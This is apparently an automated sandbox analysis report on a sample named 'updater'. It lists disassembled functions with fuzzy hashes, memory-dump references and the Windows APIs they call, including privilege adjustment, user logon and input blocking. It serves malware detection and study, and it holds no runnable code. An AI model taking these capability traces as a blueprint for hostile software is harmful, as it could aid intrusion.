Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: ccb743324ffbbc1709fbeb00be431031150d605c9d4818c287aa499b17236e52
Instruction ID: c4ac6408cd5e09b04cf1496f08008f38961c3049c3879d4e683f0ac7febd4a2d
Opcode Fuzzy Hash: ccb743324ffbbc1709fbeb00be431031150d605c9d4818c287aa499b17236e52
Instruction Fuzzy Hash: 6AF0A73550422DBBDB22AFA4CC48FEA77ACFF09761F008155B918D6181D6309940CBE1

Function 00368DE9 Relevance: 3.0, APIs: 2, Instructions: 22COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00368F27), ref: 00368DFE
CloseHandle.KERNEL32(?,?,00368F27), ref: 00368E10

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: 44d6eb5c3a8e1dbb550f03362d935a44b0e5afda986edbcba59fb0925eac87a8
Instruction ID: f0641206613ae6a312a15068e90cd8e5875b7d0ecb80eabb0389f696a778ff24
Opcode Fuzzy Hash: 44d6eb5c3a8e1dbb550f03362d935a44b0e5afda986edbcba59fb0925eac87a8
Instruction Fuzzy Hash: 3DE0EC76014610EFEB2B2B60EC49E777BADEF04310F14892DF49A844B4DB62ACE0DB50

Function 0033A385 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,00338F87,?,?,?,00000001), ref: 0033A38A
UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 0033A393

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: f4b57b22e34add9cbae6e5c81988f3407ba23cb0c22532c47a2a2cd0f109d716
Instruction ID: d82bd0bbd9576a48d7e969e352ff6a1075eaf5e7a4bd819ab1f20742a096b102
Opcode Fuzzy Hash: f4b57b22e34add9cbae6e5c81988f3407ba23cb0c22532c47a2a2cd0f109d716
Instruction Fuzzy Hash: 5EB09235064208ABCE462B91EC19B883F6CEB46BA2F004010F64D440A0CBA254508A91

Function 0033F409 Relevance: 2.1, APIs: 1, Instructions: 645COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd68fbbb3b3fe498fd42ec12a4f085ee00172ea4795a2ddb1ae70485dcba2571
Instruction ID: 1c1d1e88ab8c7cd9fdf097b190747ba088751f854c25b80c501af1e7ddd60dea
Opcode Fuzzy Hash: cd68fbbb3b3fe498fd42ec12a4f085ee00172ea4795a2ddb1ae70485dcba2571
Instruction Fuzzy Hash: 0E32F062D69F414DD7239634D862336A68CAFB73C4F55D737E81AB5EA6EF28C4834100

Function 0034265E Relevance: 1.8, APIs: 1, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6b535b2121ed55bc62055c8f09c7531ef10df51f1d89e28edf4f8b05ad88c41
Instruction ID: 5c4d122266b63b66e01ccd04b39ef12e46d3c5c83cb617df5ad378953b4e4ba7
Opcode Fuzzy Hash: e6b535b2121ed55bc62055c8f09c7531ef10df51f1d89e28edf4f8b05ad88c41
Instruction Fuzzy Hash: 8CB1EF20E2AF454DD62396398831336FB9CAFBB6D5F51D71BFC2674D62EB2185834140

Function 00378E44 Relevance: 1.6, APIs: 1, Instructions: 68COMMON

Download Yara Rule

APIs

__time64.LIBCMT ref: 00378E56

Part of subcall function 0033542A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00379529,00000000,?,?,?,?,003796DA,00000000,?), ref: 00335433
Part of subcall function 0033542A: __aulldiv.LIBCMT ref: 00335453

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: Time$FileSystem__aulldiv__time64
String ID:
API String ID: 2893107130-0
Opcode ID: 277481cdb10f0474f4630ace8c63a60a7b775fce0e73dd12819b00353ffa211a
Instruction ID: 8620079a7483de105870b0c58b7e615e1061c41565e6e107defeef16e400e7d7
Opcode Fuzzy Hash: 277481cdb10f0474f4630ace8c63a60a7b775fce0e73dd12819b00353ffa211a
Instruction Fuzzy Hash: F221DF326355108BC72ACF25E841A52B3E5EBA5310F288E6DD0F9CB2C0CF34B905CB54

Function 016D4CE1 Relevance: 1.5, APIs: 1, Instructions: 37COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,016D4D47), ref: 016D4D07

Memory Dump Source

Source File: 00000014.00000002.1673555216.00000000016CD000.00000040.00000020.00020000.00000000.sdmp, Offset: 016CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_16cd000_updater.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 834833d6f002ea05115543083cab81f2946d16a5c86d08126cb5f267c8a0ad6f
Instruction ID: 6fc93f97e29aac0aec8295765fe61621960cbb6dbd1193fe95c133a3df312b97
Opcode Fuzzy Hash: 834833d6f002ea05115543083cab81f2946d16a5c86d08126cb5f267c8a0ad6f
Instruction Fuzzy Hash: 96F06231E0430AAFEB15DFA1CC51AEEF37AFB89710F408979A51497680EBB42A44C694

Function 016D9341 Relevance: 1.5, APIs: 1, Instructions: 29COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 016D935F

Memory Dump Source

Source File: 00000014.00000002.1673555216.00000000016CD000.00000040.00000020.00020000.00000000.sdmp, Offset: 016CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_16cd000_updater.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 8c85d529f1f020f63ef7f35d006a93bef216e000dc5b01d4844948bf4808de50
Instruction ID: bb548d86df9012d3c27ab18c0fb1e08b5e22e9fb651530cb466d7ad7d7fc75ef
Opcode Fuzzy Hash: 8c85d529f1f020f63ef7f35d006a93bef216e000dc5b01d4844948bf4808de50
Instruction Fuzzy Hash: 29E0DF72F0421817D314A56C9C91EFAB36DDB6D350F0042AEB90AC7384EEB09D8142E8

Function 00320962 Relevance: 1.5, Strings: 1, Instructions: 277COMMON

Download Yara Rule

Strings

>@ABCRRRRRDEFGHIJKLMNO, xrefs: 00320B34

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID:
String ID: >@ABCRRRRRDEFGHIJKLMNO
API String ID: 0-3782972239
Opcode ID: c9f79dab2cde051612120d5873b72dfc408915168d06e0be0949ec3352aa8f57
Instruction ID: 8d0cc26f168430335eb369dcb99e895fde20634b2a063e8fcf8cac356a67f74e
Opcode Fuzzy Hash: c9f79dab2cde051612120d5873b72dfc408915168d06e0be0949ec3352aa8f57
Instruction Fuzzy Hash: 9DA127B681D7D15FD7138B34AC69692BFB1AF27218B4949CFC0C28B4A3D215E44BCB42

Function 003845D5 Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000001), ref: 003845F0

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: 0159551afd2b6b9a98089ced88e734c5d11118ff449ced7edb590d9a0eb105cc
Instruction ID: cdc8b8e255e1f896d75e569f2b331225deecbea834c8dcfdc187228580fc4d0b
Opcode Fuzzy Hash: 0159551afd2b6b9a98089ced88e734c5d11118ff449ced7edb590d9a0eb105cc
Instruction Fuzzy Hash: EAE0DF312002069FC702BF99E800A8AF7ECEF99760F00801AFC09DB711DA70E9408BA0

Function 003751E2 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00375205

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: mouse_event
String ID:
API String ID: 2434400541-0
Opcode ID: 47b0d1c61207ac42e983231248e7f251e92c8a0fbfe71fdf2be02e0c773b7c02
Instruction ID: 074b7dc1908bb496fb45c2fccf9c0e39f217c28575b290601dcea704f46564ac
Opcode Fuzzy Hash: 47b0d1c61207ac42e983231248e7f251e92c8a0fbfe71fdf2be02e0c773b7c02
Instruction Fuzzy Hash: 8AD01CA4262A0AA8ECBE03248A0FF360208A3027C2FC5C249704AC90C3A8D86882A421

Function 016D938D Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,016DABEF,00000000,016DAE08,?,?,00000000,00000000), ref: 016D93A0

Memory Dump Source

Source File: 00000014.00000002.1673555216.00000000016CD000.00000040.00000020.00020000.00000000.sdmp, Offset: 016CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_16cd000_updater.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: f1ffb4599b79f38fd8d7c650d754adac4e120045415bebdd127c198695e5f0c1
Instruction ID: 2b5650c98e5c52de38fdfeaea98773dfb1d0cb0a0a9f61ae74b84da8e7df24c1
Opcode Fuzzy Hash: f1ffb4599b79f38fd8d7c650d754adac4e120045415bebdd127c198695e5f0c1
Instruction Fuzzy Hash: 71D05E6670E2502AE220515AAD84DBB5BACCBC67A9F01403DB649C6240D600CC0793B1

Function 00369369 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00368FA7), ref: 00369389

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: LogonUser
String ID:
API String ID: 1244722697-0
Opcode ID: 041c38f61ce124f5c74bc2dc8b65f3426c804de9ebdc5132faa1bfe0ceacbf13
Instruction ID: efc6eb629b1bc2e641e5ccf211f7f2f027af3bc2e2ffbd52d0ff5fd4f0df32fb
Opcode Fuzzy Hash: 041c38f61ce124f5c74bc2dc8b65f3426c804de9ebdc5132faa1bfe0ceacbf13
Instruction Fuzzy Hash: D2D05E322A050EABEF018EA4DC01EAE3B69EB04B01F408111FE15C50A0C775E835AB60

Function 00350722 Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?), ref: 00350734

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: 18dee2495e5b915187a10d0dc227d4d1ea0a6e81e925f15af13a7e13acfd4b1f
Instruction ID: 45fffa43d510e14b03e9d5d3532e4d3be0daf7086f3c99c307ce7980b2696766
Opcode Fuzzy Hash: 18dee2495e5b915187a10d0dc227d4d1ea0a6e81e925f15af13a7e13acfd4b1f
Instruction Fuzzy Hash: E4C04CF180010DDBCB0ADBA0DA88EFE77BCAB05305F100455A545B3150D7749B448A71

Function 0033A354 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(?), ref: 0033A35A

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 1cb070e75503d3f64971546712a9362eb2e9d371601da721349bf5cc52fe4795
Instruction ID: 2b16bd7263f1ca52bd4c8efeb22e1560daad18fd6b498dae842034321dfeb6e3
Opcode Fuzzy Hash: 1cb070e75503d3f64971546712a9362eb2e9d371601da721349bf5cc52fe4795
Instruction Fuzzy Hash: 8AA0223002020CFBCF022F82FC08888BFACEB023E0F008020F80C00032CB33A8208AC0

Function 0032F628 Relevance: .6, Instructions: 608COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9cd5c2dfd4e10041bcfee75db0788af1385528a4d56b653bb4c9c6d625c0e14d
Instruction ID: ca9ef8cc672501026337005e2d35b6e1a9e3ac08a76176123d5f97275dd4d18b
Opcode Fuzzy Hash: 9cd5c2dfd4e10041bcfee75db0788af1385528a4d56b653bb4c9c6d625c0e14d
Instruction Fuzzy Hash: 5D22F631A00626CFDF2B8F28E49467CB7B5FF41348F2A807AE4968B995D7349D81D742

Function 016DB477 Relevance: .4, Instructions: 397COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.1673555216.00000000016CD000.00000040.00000020.00020000.00000000.sdmp, Offset: 016CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_16cd000_updater.jbxd

Similarity

API ID: FreeString
String ID:
API String ID: 3341692771-0
Opcode ID: cc69674234b2b652480230ace1e8f74ae6088297678bb0bf8fd0b01ccfb46c65
Instruction ID: 66fd9ce5bdf345e1ec1ca6acc147a069fbd1bb2ffa194d13b7aa68e0ff65c91f
Opcode Fuzzy Hash: cc69674234b2b652480230ace1e8f74ae6088297678bb0bf8fd0b01ccfb46c65
Instruction Fuzzy Hash: 25E1923098E7C58FC357DFB0CD110893FB2AF5312030986DEC4928B6A7DA6AAD0AD755

Function 003323F5 Relevance: .3, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction ID: 7c69aff0a68b941297da95ef4656fefbccc5c6f7dffc75c9a022aa52801e5eba
Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction Fuzzy Hash: E9C171322051930ADF2F463A84B413FFAA15EA27B1B5B476DE8B3CB1D5EF20C564D620

Function 0033282A Relevance: .3, Instructions: 341COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction ID: 018af42ee076377745fa68083ad6c0f46d25514b3eb3983b5fb686d59497edd5
Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction Fuzzy Hash: 00C160322091930ADF2F463A84B413FFAA15BA27B1B5B576DE4B3DB1D5EF20C524D620

Function 003132C0 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96d038d7aebc94a61b38a230b9b20de37a2389589e995dd407866a741b5ac996
Instruction ID: 5f305712a553a23c203a9d4bd0b91410d4d8c7ddcae9f6d2e9fd09c83460fc06
Opcode Fuzzy Hash: 96d038d7aebc94a61b38a230b9b20de37a2389589e995dd407866a741b5ac996
Instruction Fuzzy Hash: 10E09A9281AB9A3E7F49B8B6481F2DBAFD06523380F773128C10547883E5440907BAE0

Function 016F72FE Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.1673555216.00000000016F5000.00000040.00000020.00020000.00000000.sdmp, Offset: 016F5000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_16f5000_updater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d5486f6e5b9d9d61447aadb6395f99df315b0362e95f2a9dd6700af68e1202b
Instruction ID: 46fffad2984150b6ce3e2c4a94205058da5cb2a891c9c5f4a93270133e46975e
Opcode Fuzzy Hash: 2d5486f6e5b9d9d61447aadb6395f99df315b0362e95f2a9dd6700af68e1202b
Instruction Fuzzy Hash: 05F08233214241EFE7B1CE5DDCC2F55B7A8EB40660F59047DDB8097251C360E844D690

Function 016E54A5 Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.1673555216.00000000016CD000.00000040.00000020.00020000.00000000.sdmp, Offset: 016CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_16cd000_updater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2a2d129c8543363c052d008b34330d58e57021dec0e7df0c1a6226ed5b22a4b
Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
Opcode Fuzzy Hash: c2a2d129c8543363c052d008b34330d58e57021dec0e7df0c1a6226ed5b22a4b
Instruction Fuzzy Hash:

Function 0039ABFF Relevance: 49.8, APIs: 33, Instructions: 274COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 0039AC55
GetSysColorBrush.USER32(0000000F), ref: 0039AC86
GetSysColor.USER32(0000000F), ref: 0039AC92
SetBkColor.GDI32(?,000000FF), ref: 0039ACAC
SelectObject.GDI32(?,?), ref: 0039ACBB
InflateRect.USER32(?,000000FF,000000FF), ref: 0039ACE6
GetSysColor.USER32(00000010), ref: 0039ACEE
CreateSolidBrush.GDI32(00000000), ref: 0039ACF5
FrameRect.USER32(?,?,00000000), ref: 0039AD04
DeleteObject.GDI32(00000000), ref: 0039AD0B
InflateRect.USER32(?,000000FE,000000FE), ref: 0039AD56
FillRect.USER32(?,?,?), ref: 0039AD88
GetWindowLongW.USER32(?,000000F0), ref: 0039ADB3

Part of subcall function 0039AF18: GetSysColor.USER32(00000012), ref: 0039AF51
Part of subcall function 0039AF18: SetTextColor.GDI32(?,?), ref: 0039AF55
Part of subcall function 0039AF18: GetSysColorBrush.USER32(0000000F), ref: 0039AF6B
Part of subcall function 0039AF18: GetSysColor.USER32(0000000F), ref: 0039AF76
Part of subcall function 0039AF18: GetSysColor.USER32(00000011), ref: 0039AF93
Part of subcall function 0039AF18: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0039AFA1
Part of subcall function 0039AF18: SelectObject.GDI32(?,00000000), ref: 0039AFB2
Part of subcall function 0039AF18: SetBkColor.GDI32(?,00000000), ref: 0039AFBB
Part of subcall function 0039AF18: SelectObject.GDI32(?,?), ref: 0039AFC8
Part of subcall function 0039AF18: InflateRect.USER32(?,000000FF,000000FF), ref: 0039AFE7
Part of subcall function 0039AF18: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0039AFFE
Part of subcall function 0039AF18: GetWindowLongW.USER32(00000000,000000F0), ref: 0039B013

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

